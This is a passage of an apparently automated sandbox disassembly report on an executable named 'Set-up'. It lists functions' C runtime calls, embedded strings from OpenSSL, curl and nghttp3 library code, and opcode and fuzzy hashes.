                                  • Part of subcall function 001173F0: memcpy.API-MS-WIN-CRT-PRIVATE-L1-1-0(-00000008,?,00000001), ref: 00117445
                                  • Part of subcall function 001547D0: fgets.API-MS-WIN-CRT-STDIO-L1-1-0(00000080,00000080,?), ref: 001547FB
                                  • Part of subcall function 001547D0: strlen.API-MS-WIN-CRT-STRING-L1-1-0(00000000), ref: 0015480C
                                  • Part of subcall function 001547D0: feof.API-MS-WIN-CRT-STDIO-L1-1-0(?), ref: 00154837
                                • strlen.API-MS-WIN-CRT-STRING-L1-1-0(00000001), ref: 00116844
                                • memcmp.API-MS-WIN-CRT-PRIVATE-L1-1-0(?,unlimited,0000000A), ref: 00116876
                                • strlen.API-MS-WIN-CRT-STRING-L1-1-0(?,?), ref: 001168FD
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1767167567.0000000000111000.00000020.00000001.01000000.00000003.sdmp, Offset: 00110000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_110000_Set-up.jbxd
                                Similarity
                                • API ID: strlen$feoffgetsmemcmpmemcpy
                                • String ID: %256s "%64[^"]"$hsts.c$unlimited
                                • API String ID: 288886899-2895786126
                                • Opcode ID: e36352199180df2bd61c380ae7fcd49b59bc1530369b7af2356c381af403ba50
                                • Instruction ID: 38a5c09eeb75091ea6c5fc730b5893aa746e61c788e07b01a9e7e7a26de4763c
                                • Opcode Fuzzy Hash: e36352199180df2bd61c380ae7fcd49b59bc1530369b7af2356c381af403ba50
                                • Instruction Fuzzy Hash: 21513D71945341BFDB189B249C42AAB76959F65704F14083CFC48A72C3FB36DA85C7A3
                                APIs
                                • strlen.API-MS-WIN-CRT-STRING-L1-1-0(?,?,?,00000001,00309265,?,00000400,00000000,?), ref: 00308254
                                • memcpy.API-MS-WIN-CRT-PRIVATE-L1-1-0(?,?,00309265,?), ref: 00308264
                                • memset.API-MS-WIN-CRT-STRING-L1-1-0(?,00000000,00309265,?,?,?,?,?,?,00309265,?,00000400,00000000,?), ref: 003082C7
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1767167567.0000000000111000.00000020.00000001.01000000.00000003.sdmp, Offset: 00110000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_110000_Set-up.jbxd
                                Similarity
                                • API ID: memcpymemsetstrlen
                                • String ID: Enter PEM pass phrase:$PEM_def_callback$crypto/pem/pem_lib.c
                                • API String ID: 160209724-3271887637
                                • Opcode ID: 9ab89b393509b280e3562f513ae9baed2de3ef3f5999abe0bafe7bb6e713a09c
                                • Instruction ID: 14eb266a57f70cc0242475a1631dce5b019a2913e888fd0d6c5761605dd78f51
                                • Opcode Fuzzy Hash: 9ab89b393509b280e3562f513ae9baed2de3ef3f5999abe0bafe7bb6e713a09c
                                • Instruction Fuzzy Hash: 13012DE670531137EA107569BC83F6B2A4CCB917A9F08053EFE04E21C3EA55EC1555B6
                                APIs
                                • malloc.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 001B895D
                                • __acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0 ref: 001B8991
                                • _fileno.API-MS-WIN-CRT-STDIO-L1-1-0 ref: 001B899A
                                • _write.API-MS-WIN-CRT-STDIO-L1-1-0 ref: 001B89AB
                                • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 001B89B4
                                • abort.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 001B89B9
                                Memory Dump Source
                                • Source File: 00000000.00000002.1767167567.0000000000111000.00000020.00000001.01000000.00000003.sdmp, Offset: 00110000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_110000_Set-up.jbxd
                                Similarity
                                • API ID: __acrt_iob_func_fileno_writeabortfreemalloc
                                • String ID:
                                • API String ID: 1064163434-0
                                • Opcode ID: 408c16d5ee7fe2d9d0f2fdc6e30b45ec9a9249864bbf06c77cc95b5efdb05d46
                                • Instruction ID: 3605c5c3eace6b9cc1fe0b82722e2851a25133e9ef1a3af8a904a8eb45d88554
                                • Opcode Fuzzy Hash: 408c16d5ee7fe2d9d0f2fdc6e30b45ec9a9249864bbf06c77cc95b5efdb05d46
                                • Instruction Fuzzy Hash: BD1192B44093109BD740AF2A858462EFBE8BF99B48F41492EF9C883341EB749944CF93
                                APIs
                                • _initialize_narrow_environment.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00498928
                                • _configure_narrow_argv.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,?,?,?,?,?,?,?,?,?,0011115A), ref: 0049893D
                                • __p___argc.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,?,?,?,?,?,?,?,?,?,0011115A), ref: 00498942
                                • __p___argv.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,?,?,?,?,?,?,?,?,?,0011115A), ref: 0049894F
                                • __p__environ.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(?,?,?,?,?,?,?,?,?,?,?,?,0011115A), ref: 0049895C
                                • _set_new_mode.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,?,?,?,?,?,?,?,?,?,0011115A), ref: 00498972
                                Memory Dump Source
                                • Source File: 00000000.00000002.1767167567.0000000000111000.00000020.00000001.01000000.00000003.sdmp, Offset: 00110000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_110000_Set-up.jbxd
                                Similarity
                                • API ID: __p___argc__p___argv__p__environ_configure_narrow_argv_initialize_narrow_environment_set_new_mode
                                • String ID:
                                • API String ID: 3593706420-0
                                • Opcode ID: 1efc63e94736ec762dde092320e3d59adf545601741b22b2780315d7096a2df3
                                • Instruction ID: 57cced812a37d1047887f4b42c6bc0ea65a9352ce9449f4de6686b32b9685a6f
                                • Opcode Fuzzy Hash: 1efc63e94736ec762dde092320e3d59adf545601741b22b2780315d7096a2df3
                                • Instruction Fuzzy Hash: B1F0B7746147408FCB00BF7DC48181A7BE0AF9A318F504AADF5909B362DA39D9419F96
                                APIs
                                • _errno.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,00000000,00000000,?,?,00145B6B,00000017,?,?), ref: 00174612
                                • memchr.API-MS-WIN-CRT-PRIVATE-L1-1-0(0123456789abcdef,?,00000011), ref: 00174660
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1767167567.0000000000111000.00000020.00000001.01000000.00000003.sdmp, Offset: 00110000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_110000_Set-up.jbxd
                                Similarity
                                • API ID: _errnomemchr
                                • String ID: 0123456789ABCDEF$0123456789abcdef
                                • API String ID: 4119152314-885041942
                                • Opcode ID: ac6f5a8deb80cb9447603a4f7db31bf4c2c5d62d57c698b5df912ab3255717e2
                                • Instruction ID: b4b5944a02b1c2398b4adfaff5bb30cf33900660ddf357f587b58b0027781f07
                                • Opcode Fuzzy Hash: ac6f5a8deb80cb9447603a4f7db31bf4c2c5d62d57c698b5df912ab3255717e2
                                • Instruction Fuzzy Hash: 3591F275A083458BD728DE6CC84027AB7F2AFD6314F19CA2DE9DD87381DB359D848B42
                                APIs
                                • strlen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 0016225F
                                • _time64.API-MS-WIN-CRT-TIME-L1-1-0(00000000), ref: 001622CF
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1767167567.0000000000111000.00000020.00000001.01000000.00000003.sdmp, Offset: 00110000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_110000_Set-up.jbxd
                                Similarity
                                • API ID: _time64strlen
                                • String ID: :%u$Hostname in DNS cache does not have needed family, zapped$Hostname in DNS cache was stale, zapped
                                • API String ID: 3014104814-1335658360
                                • Opcode ID: e53922ce9046ca4ce7984e52c357c2c889c4d2a19746d6fe8878586ef3f76696
                                • Instruction ID: 7daec466a094138336dc2f5b165bbe9108d2f2979450391de066de317ec087f1
                                • Opcode Fuzzy Hash: e53922ce9046ca4ce7984e52c357c2c889c4d2a19746d6fe8878586ef3f76696
                                • Instruction Fuzzy Hash: 4941E671A007045BD7249A28DC85B7BB7D5BF94319F08443CEE9AC7382EB39AC65C691
                                APIs
                                • _assert.API-MS-WIN-CRT-RUNTIME-L1-1-0(ctx->next_absidx > absidx,nghttp3_qpack.c,000008B6,?,?,001C0307,?), ref: 001C07AE
                                • _assert.API-MS-WIN-CRT-RUNTIME-L1-1-0(ctx->next_absidx - absidx - 1 < nghttp3_ringbuf_len(&ctx->dtable),nghttp3_qpack.c,000008B7,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 001C07C3
                                Strings
                                • ctx->next_absidx > absidx, xrefs: 001C07A9
                                • ctx->next_absidx - absidx - 1 < nghttp3_ringbuf_len(&ctx->dtable), xrefs: 001C07BE
                                • nghttp3_qpack.c, xrefs: 001C07A4, 001C07B9
                                Memory Dump Source
                                • Source File: 00000000.00000002.1767167567.0000000000111000.00000020.00000001.01000000.00000003.sdmp, Offset: 00110000, based on PE: true
                                Similarity
                                • API ID: _assert
                                • String ID: ctx->next_absidx - absidx - 1 < nghttp3_ringbuf_len(&ctx->dtable)$ctx->next_absidx > absidx$nghttp3_qpack.c
                                • API String ID: 1222420520-241347991
                                • Opcode ID: cab616e2ba350f5e27ba30af674ccda6d98213bed5b9029336c5f6e51029c0b7
                                • Instruction ID: dd00878e6132eaf9b8d7cbc22f05d3ece721c1201f2165d4e86d91a467f248b4
                                • Opcode Fuzzy Hash: cab616e2ba350f5e27ba30af674ccda6d98213bed5b9029336c5f6e51029c0b7
                                • Instruction Fuzzy Hash: 7F31B1B5B00704AFD315EA28DC81F6B73E5BFA9714F05852CF98597282E730F85587A2
                                APIs
                                • _stat64.API-MS-WIN-CRT-FILESYSTEM-L1-1-0(00125FB6,?), ref: 00494645
                                • _stat64.API-MS-WIN-CRT-FILESYSTEM-L1-1-0(../list/public_suffix_list.dat,?), ref: 00494698
                                • fopen.API-MS-WIN-CRT-STDIO-L1-1-0(?,007F1278), ref: 00494744
                                • fclose.API-MS-WIN-CRT-STDIO-L1-1-0(00000000), ref: 00494762
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1767167567.0000000000111000.00000020.00000001.01000000.00000003.sdmp, Offset: 00110000, based on PE: true
                                Similarity
                                • API ID: _stat64$fclosefopen
                                • String ID: ../list/public_suffix_list.dat
                                • API String ID: 1085753941-141370353
                                • Opcode ID: c5c4daaa39a3b53cac719e18a426b5554cf0fbf1419ababfedbc268ff67224ff
                                • Instruction ID: 26ff320a5f8446646b40514f8f5a15643da1890fba281b04f4d92ef88caac392
                                • Opcode Fuzzy Hash: c5c4daaa39a3b53cac719e18a426b5554cf0fbf1419ababfedbc268ff67224ff
                                • Instruction Fuzzy Hash: E3417CB1A083459BCB00CF98D440B5BBBE5ABC5758F15483EE984D7340D778ED4ACB9A
                                APIs
                                • _assert.API-MS-WIN-CRT-RUNTIME-L1-1-0(nghttp3_ksl_it_get(&it) == stream,nghttp3_qpack.c,000008ED,?,?,?,?,?,?,?,00000000,00000000,00000000,?,001BEF0E,?), ref: 001BEA23
                                • _assert.API-MS-WIN-CRT-RUNTIME-L1-1-0(!nghttp3_ksl_it_end(&it),nghttp3_qpack.c,000008EC,?,?,?,?,?,?,?,00000000,00000000,00000000,?,001BEF0E,?), ref: 001BEA38
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1767167567.0000000000111000.00000020.00000001.01000000.00000003.sdmp, Offset: 00110000, based on PE: true
                                Similarity
                                • API ID: _assert
                                • String ID: !nghttp3_ksl_it_end(&it)$nghttp3_ksl_it_get(&it) == stream$nghttp3_qpack.c
                                • API String ID: 1222420520-1964160224
                                • Opcode ID: 0401de43f0d0ee6af377337d4a6eb7e9c6c3521cd269470827f9597ae1386039
                                • Instruction ID: 454ae5d8fc1e42077451d3b656f0ba68bfc014ca82bdec20ba331d87ab661029
                                • Opcode Fuzzy Hash: 0401de43f0d0ee6af377337d4a6eb7e9c6c3521cd269470827f9597ae1386039
                                • Instruction Fuzzy Hash: 4A319F76904309AFD710DE54DC81EDBB7BCFF95768F008519F8985B292E730A944CBA2
                                APIs
                                • _time64.API-MS-WIN-CRT-TIME-L1-1-0(00000000), ref: 00182771
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1767167567.0000000000111000.00000020.00000001.01000000.00000003.sdmp, Offset: 00110000, based on PE: true
                                Similarity
                                • API ID: _time64
                                • String ID: Connection time-out$gfff$netascii$set timeouts for state %d; Total % lld, retry %d maxtry %d
                                • API String ID: 1670930206-2395985473
                                • Opcode ID: fe6ae2e29df14b9ff19eec8398ff99f970ff3651fc02c4fe4cd67d752f134272
                                • Instruction ID: 2774c060a9a768104cc7ce7a823725de01c6435deb34f7ef91e6b5d6695e8f5e
                                • Opcode Fuzzy Hash: fe6ae2e29df14b9ff19eec8398ff99f970ff3651fc02c4fe4cd67d752f134272
                                • Instruction Fuzzy Hash: C4212EB1B003005FEB286A2A9C05F2779DAEBD4304F18853DF909CB2D2F675D9108B61
                                APIs
                                • _assert.API-MS-WIN-CRT-RUNTIME-L1-1-0(veccnt > 0,nghttp3_stream.c,0000033D), ref: 001B6119
                                • _assert.API-MS-WIN-CRT-RUNTIME-L1-1-0(0 == offset,nghttp3_stream.c,00000349), ref: 001B612E
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1767167567.0000000000111000.00000020.00000001.01000000.00000003.sdmp, Offset: 00110000, based on PE: true
                                Similarity
                                • API ID: _assert
                                • String ID: 0 == offset$nghttp3_stream.c$veccnt > 0
                                • API String ID: 1222420520-3888743547
                                • Opcode ID: f2a0986be2e88b84bafb3bf257a3e9da41f335021b175134054e6cfee34d84c2
                                • Instruction ID: 92f8ea403f5da4eae51223c6ba77126233eef4059fb1b17d84b2809292052417
                                • Opcode Fuzzy Hash: f2a0986be2e88b84bafb3bf257a3e9da41f335021b175134054e6cfee34d84c2
                                • Instruction Fuzzy Hash: 2231F7715043058FC704EF19D885AAAB7E4FFA8318F05867CF98A57392E735AD41CB91
                                APIs
                                • _assert.API-MS-WIN-CRT-RUNTIME-L1-1-0(n <= balloc->blklen,nghttp3_balloc.c,00000042,?,00000000,?,001B4D5A,00000000,?,000001F0), ref: 001B8861
                                • _assert.API-MS-WIN-CRT-RUNTIME-L1-1-0(((uintptr_t)balloc->buf.last & 0xfu) == 0,nghttp3_balloc.c,00000055,?,000001F0), ref: 001B8873
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1767167567.0000000000111000.00000020.00000001.01000000.00000003.sdmp, Offset: 00110000, based on PE: true
                                Similarity
                                • API ID: _assert
                                • String ID: ((uintptr_t)balloc->buf.last & 0xfu) == 0$n <= balloc->blklen$nghttp3_balloc.c
                                • API String ID: 1222420520-3025919285
                                • Opcode ID: eb74b44776314e085e509e9845d8e90ed4b09730b3424f169415ac1fa9eb0f22
                                • Instruction ID: a576ccc7f2274a9a7769a34666689070c407ddb3f472dbf0d4d679caa27d053c
                                • Opcode Fuzzy Hash: eb74b44776314e085e509e9845d8e90ed4b09730b3424f169415ac1fa9eb0f22
                                • Instruction Fuzzy Hash: 1111CEF6A04702BBC6009F28EC41996B3A8FF55B25F044624F914A22D2DB34E820CBE5
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1767167567.0000000000111000.00000020.00000001.01000000.00000003.sdmp, Offset: 00110000, based on PE: true
                                Similarity
                                • API ID:
                                • String ID: application/octet-stream$formdata.c
                                • API String ID: 0-1216067158
                                • Opcode ID: 055bc8df7f1b7687725c21d0029d5519a24980ae9d8821731835812114cf74a4
                                • Instruction ID: f7ee019da668166f3c17e4a1c887bf4a04eaaa555e2f353bb0b70e8541fd6219
                                • Opcode Fuzzy Hash: 055bc8df7f1b7687725c21d0029d5519a24980ae9d8821731835812114cf74a4
                                • Instruction Fuzzy Hash: B102B770A08B409FEB2D9F14D9407A67BE27F95708F19483CE88A4B792D775E8C5CB81
                                APIs
                                • strlen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 003B46DD
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1767167567.0000000000111000.00000020.00000001.01000000.00000003.sdmp, Offset: 00110000, based on PE: true
                                Similarity
                                • API ID: strlen
                                • String ID: ASN1_mbstring_ncopy$crypto/asn1/a_mbstr.c$maxsize=%ld$minsize=%ld
                                • API String ID: 39653677-2338284442
                                • Opcode ID: e47bbab925e540b508df9f401285c61961df45dfcf0728fc845f74e60e561024
                                • Instruction ID: a711bd78cb1b1750f8bb1b34dbcda80f56f02a30a11203d2317a02f268957a8c
                                • Opcode Fuzzy Hash: e47bbab925e540b508df9f401285c61961df45dfcf0728fc845f74e60e561024
                                • Instruction Fuzzy Hash: 85A1FC75B483016BE7126E149C42FAB7394AB91708F05462CFB899B7C3E7B5DC108A5F
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1767167567.0000000000111000.00000020.00000001.01000000.00000003.sdmp, Offset: 00110000, based on PE: true
                                Similarity
                                • API ID:
                                • String ID: .%lu$crypto/objects/obj_dat.c
                                • API String ID: 0-3322715555
                                • Opcode ID: 4a1cbdae02fa92b7e766078ef11dca92ffc92aae7ddca7dfe409fa172c7d6019
                                • Instruction ID: e91cf0f498f35d3bef5274d2531d4aec93a7ac2975334982eff381ecf63b3f5f
                                • Opcode Fuzzy Hash: 4a1cbdae02fa92b7e766078ef11dca92ffc92aae7ddca7dfe409fa172c7d6019
                                • Instruction Fuzzy Hash: 35A12771A0A3015BDB129E258C6872BB7E9AFD1704F19882DFC898B3C1EB71DC04C792
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1767167567.0000000000111000.00000020.00000001.01000000.00000003.sdmp, Offset: 00110000, based on PE: true
                                Similarity
                                • API ID:
                                • String ID: No URL set$User-Agent: %s$cannot mix POSTFIELDS with RESUME_FROM$transfer.c
                                • API String ID: 0-950935550
                                • Opcode ID: b65092d45b5848b33b569b250fc551f10799f90cc392e2750d71f05af0e9a249
                                • Instruction ID: 57679fba3ffc2bddb2ac7ddd30af2bf0bd1022616adafc0ab1316dc82763762d
                                • Opcode Fuzzy Hash: b65092d45b5848b33b569b250fc551f10799f90cc392e2750d71f05af0e9a249
                                • Instruction Fuzzy Hash: E0B1C8B5B00B12ABE7199B74EC45BA6F7A0BF55315F080339E82C96281E7357474CBD1
                                APIs
                                • strlen.API-MS-WIN-CRT-STRING-L1-1-0(00000000), ref: 0026A37F
                                Strings
                                • ssl/quic/quic_channel.c, xrefs: 0026A2E3, 0026A3BA
                                • ossl_quic_channel_raise_protocol_error_loc, xrefs: 0026A2D9, 0026A3B0
                                • QUIC error code: 0x%llx%s%s%s, reason: "%s", xrefs: 0026A3D5
                                • QUIC error code: 0x%llx%s%s%s (triggered by frame type: 0x%llx%s%s%s), reason: "%s", xrefs: 0026A310
                                Memory Dump Source
                                • Source File: 00000000.00000002.1767167567.0000000000111000.00000020.00000001.01000000.00000003.sdmp, Offset: 00110000, based on PE: true
                                Similarity
                                • API ID: strlen
                                • String ID: QUIC error code: 0x%llx%s%s%s (triggered by frame type: 0x%llx%s%s%s), reason: "%s"$QUIC error code: 0x%llx%s%s%s, reason: "%s"$ossl_quic_channel_raise_protocol_error_loc$ssl/quic/quic_channel.c
                                • API String ID: 39653677-1084217658
                                • Opcode ID: 7ac72be18f246bafcb3ed2298b80cf1d6747ac782401693753292469039f6fea
                                • Instruction ID: 7b51d17539189fd3cf901b283151b085a2e7831210da1e9d12cc0f2f2e8165a3
                                • Opcode Fuzzy Hash: 7ac72be18f246bafcb3ed2298b80cf1d6747ac782401693753292469039f6fea
                                • Instruction Fuzzy Hash: 885191B1A14345ABCF00DF68DC42E9B7BE9AF88354F044528FD48A7202E775D9608FA2
                                APIs
                                • _errno.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,?,001E0E3B,?,?,00000000,?), ref: 004963E9
                                • _errno.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,001E0E3B,?,?,00000000,?), ref: 004963FB
                                Memory Dump Source
                                • Source File: 00000000.00000002.1767167567.0000000000111000.00000020.00000001.01000000.00000003.sdmp, Offset: 00110000, based on PE: true
                                Similarity
                                • API ID: _errno
                                • String ID:
                                • API String ID: 2918714741-0
                                • Opcode ID: 14e91697afff0e5bb4c7250993eb4cde2c0e37f3ab3392e821df9ba815fe96fa
                                • Instruction ID: 4e7f960594a485eb950ce6da41005618d2fb08b0d011cdb5a33b98c4e913b7bb
                                • Opcode Fuzzy Hash: 14e91697afff0e5bb4c7250993eb4cde2c0e37f3ab3392e821df9ba815fe96fa
                                • Instruction Fuzzy Hash: 9841C271A043019BDF109F699880A2B7BE8AF94754F1A443EFC49C7301E678EC05869A
                                APIs
                                • strlen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 002C691C
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1767167567.0000000000111000.00000020.00000001.01000000.00000003.sdmp, Offset: 00110000, based on PE: true
                                Similarity
                                • API ID: strlen
                                • String ID: err:%lx:%lx:%lx:%lx$error:%08lX:%s:%s:%s$lib(%lu)$reason(%lu)
                                • API String ID: 39653677-804487489
                                • Opcode ID: 93fd4015da321054b106a8d62c82192ddfa39261fb91b2f8e040256e6f60a2ac
                                • Instruction ID: f441b9aa8676c89f5af054fc01c8784deda528411ece18adc3e7aefeabdd9049
                                • Opcode Fuzzy Hash: 93fd4015da321054b106a8d62c82192ddfa39261fb91b2f8e040256e6f60a2ac
                                • Instruction Fuzzy Hash: 47310BB2A243056BFB206E155C4AFA7769CAB91354F04053CFD4C52193F776AC38C6A2
                                APIs
                                • strlen.API-MS-WIN-CRT-STRING-L1-1-0(?,?,?,0045ABB9), ref: 0045A34E
                                  • Part of subcall function 002EE270: _errno.API-MS-WIN-CRT-RUNTIME-L1-1-0(crypto/mem_sec.c,00000187,assertion failed: ((ptr - sh.arena) & ((sh.arena_size >> list) - 1)) == 0,crypto/mem_sec.c,00000185,assertion failed: list >= 0 && list < sh.freelist_size,crypto/mem_sec.c,00000184,-00000001), ref: 002EE28D
                                • strlen.API-MS-WIN-CRT-STRING-L1-1-0(00000000,?,?,?,?,?,0045ABB9), ref: 0045A446
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1767167567.0000000000111000.00000020.00000001.01000000.00000003.sdmp, Offset: 00110000, based on PE: true
                                Similarity
                                • API ID: strlen$_errno
                                • String ID: .cnf$.conf$crypto/conf/conf_def.c
                                • API String ID: 3066963124-3060939390
                                • Opcode ID: 6597f53d55e4e2f13c729d9244741f54085292782086979ceafd12fd71b0ce9e
                                • Instruction ID: 0e607a11eb8040426f6885672d23637d65821565f9465bda883ec82f6e017c44
                                • Opcode Fuzzy Hash: 6597f53d55e4e2f13c729d9244741f54085292782086979ceafd12fd71b0ce9e
                                • Instruction Fuzzy Hash: 9B2125E2D4424167DA107672AC43E1B368C8F5234AF48093EFC0596283F76DDE3886A7
                                APIs
                                • memset.API-MS-WIN-CRT-STRING-L1-1-0(?,00000000,?,00000000,00000000,00000000,00000100,?,002EF556,00000000,FFFFFFFF,00000000,?,00000000,002F06DF,?), ref: 002A08D7
                                • memset.API-MS-WIN-CRT-STRING-L1-1-0(00000000,00000000,?,?,00000000,0026973B), ref: 002A0977
                                  • Part of subcall function 002C7220: strlen.API-MS-WIN-CRT-STRING-L1-1-0(?,crypto/engine/eng_list.c,000000EB,ENGINE_get_first,00000000,002EBD91), ref: 002C7262
                                  • Part of subcall function 002C7220: strcpy.API-MS-WIN-CRT-STRING-L1-1-0(00000000,?,?,?,?,?,crypto/engine/eng_list.c,000000EB,ENGINE_get_first,00000000,002EBD91), ref: 002C7285
                                  • Part of subcall function 002C7220: strlen.API-MS-WIN-CRT-STRING-L1-1-0(?,?,?,?,crypto/engine/eng_list.c,000000EB,ENGINE_get_first,00000000,002EBD91), ref: 002C72C5
                                  • Part of subcall function 002C7220: strcpy.API-MS-WIN-CRT-STRING-L1-1-0(00000000,?,?,?,?,?,?,?,?,crypto/engine/eng_list.c,000000EB,ENGINE_get_first,00000000,002EBD91), ref: 002C72E8
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1767167567.0000000000111000.00000020.00000001.01000000.00000003.sdmp, Offset: 00110000, based on PE: true
                                Similarity
                                • API ID: memsetstrcpystrlen
                                • String ID: BUF_MEM_grow$crypto/buffer/buffer.c
                                • API String ID: 1298912638-2735992530
                                • Opcode ID: 57982fdca97bd67896b99bc8e4f090a25bb0645e46d6f14021e37e268194156a
                                • Instruction ID: ec22de5a72e1de42fa221e97a2fe354e3ed71d4beac5681eaf53058301ecb1f9
                                • Opcode Fuzzy Hash: 57982fdca97bd67896b99bc8e4f090a25bb0645e46d6f14021e37e268194156a
                                • Instruction Fuzzy Hash: AC3131B1A602077BE7109E259C82F1BB79CAF41B24F144629F81C973C3E769AC3487D5
                                APIs
                                  • Part of subcall function 00497850: _errno.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,?,004966E9,?,?,?,?,?,?,?,?,?,?,?), ref: 0049787B
                                • _errno.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,UTF-8,00000001,?,?,?,?,00000001,00000000,00000000,?,00000009,?), ref: 004966F5
                                • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,0081422C,?,?,00000001,00000000,00000000,?,00000009,?), ref: 00496714
                                • _errno.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,?,?,?,?,?,?,?,00000001,00000000,00000000,?,00000009,?), ref: 00496727
                                • _errno.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00496776
                                • _errno.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 004967CC
                                Memory Dump Source
                                • Source File: 00000000.00000002.1767167567.0000000000111000.00000020.00000001.01000000.00000003.sdmp, Offset: 00110000, based on PE: true
                                Similarity
                                • API ID: _errno$strcmp
                                • String ID:
                                • API String ID: 3909137471-0
                                • Opcode ID: 57b2f149fe7bb17e1a68079a2d152a67dac08d219a4fa61685c72bfb3741a81c
                                • Instruction ID: 90d1b3f9da244d2e5fb8945ea4c37c236a3b9f5ee1dd684e067660e90820a5d8
                                • Opcode Fuzzy Hash: 57b2f149fe7bb17e1a68079a2d152a67dac08d219a4fa61685c72bfb3741a81c
                                • Instruction Fuzzy Hash: D931AE356002009FCF109FA9EC40A1B7AA9AF4A36CF4605B9FA98D7311E739ED11CB95
                                APIs
                                • memset.API-MS-WIN-CRT-STRING-L1-1-0(?,?,?,?,?,?,?,002F2704,00000008), ref: 002F204D
                                  • Part of subcall function 002C7220: strlen.API-MS-WIN-CRT-STRING-L1-1-0(?,crypto/engine/eng_list.c,000000EB,ENGINE_get_first,00000000,002EBD91), ref: 002C7262
                                  • Part of subcall function 002C7220: strcpy.API-MS-WIN-CRT-STRING-L1-1-0(00000000,?,?,?,?,?,crypto/engine/eng_list.c,000000EB,ENGINE_get_first,00000000,002EBD91), ref: 002C7285
                                  • Part of subcall function 002C7220: strlen.API-MS-WIN-CRT-STRING-L1-1-0(?,?,?,?,crypto/engine/eng_list.c,000000EB,ENGINE_get_first,00000000,002EBD91), ref: 002C72C5
                                  • Part of subcall function 002C7220: strcpy.API-MS-WIN-CRT-STRING-L1-1-0(00000000,?,?,?,?,?,?,?,?,crypto/engine/eng_list.c,000000EB,ENGINE_get_first,00000000,002EBD91), ref: 002C72E8
                                • memcpy.API-MS-WIN-CRT-PRIVATE-L1-1-0(?,?,?,?,?,?,?,002F2704,00000008), ref: 002F20C3
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1767167567.0000000000111000.00000020.00000001.01000000.00000003.sdmp, Offset: 00110000, based on PE: true
                                Similarity
                                • API ID: strcpystrlen$memcpymemset
                                • String ID: copy_integer$crypto/params.c$general_set_int
                                • API String ID: 2323844366-2562949257
                                • Opcode ID: 53cdda920071fd9ccab5f50ed82219e7f8d810c3c4e850262c938ade6a39834c
                                • Instruction ID: a752bdb04469742f063b6f5023f7f01643b92fb0f707e5f9c6ed80ee30a6132a
                                • Opcode Fuzzy Hash: 53cdda920071fd9ccab5f50ed82219e7f8d810c3c4e850262c938ade6a39834c
                                • Instruction Fuzzy Hash: EE212DB1B283099BD23069189C82F77F794DB66744F14013EFF0997283E9D6AC2DC6A5
                                APIs
                                • memset.API-MS-WIN-CRT-STRING-L1-1-0(?,00000000,?,?,?,?,002F299E,00000008), ref: 002F21A8
                                • memcpy.API-MS-WIN-CRT-PRIVATE-L1-1-0(?,?,?,?,?,?,002F299E,00000008), ref: 002F21FE
                                  • Part of subcall function 002F40A0: memset.API-MS-WIN-CRT-STRING-L1-1-0(?,00000000,?,?,?,?,002F2075,?,?,?,?,?,?,002F2704,00000008), ref: 002F40C1
                                  • Part of subcall function 002F40A0: memcpy.API-MS-WIN-CRT-PRIVATE-L1-1-0(?,?,?,?,?,?,002F2075,?,?,?,?,?,?,002F2704,00000008), ref: 002F411E
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1767167567.0000000000111000.00000020.00000001.01000000.00000003.sdmp, Offset: 00110000, based on PE: true
                                Similarity
                                • API ID: memcpymemset
                                • String ID: copy_integer$crypto/params.c$general_get_uint
                                • API String ID: 1297977491-1187682564
                                • Opcode ID: d8c1b3940f5325ac0216dacfbd218614da8967f1274936c00028ed3eaf688162
                                • Instruction ID: 07d5e0fc6d6b7ab5e97f02d83d7881087103912212a734ae387c0bf307d0ebe7
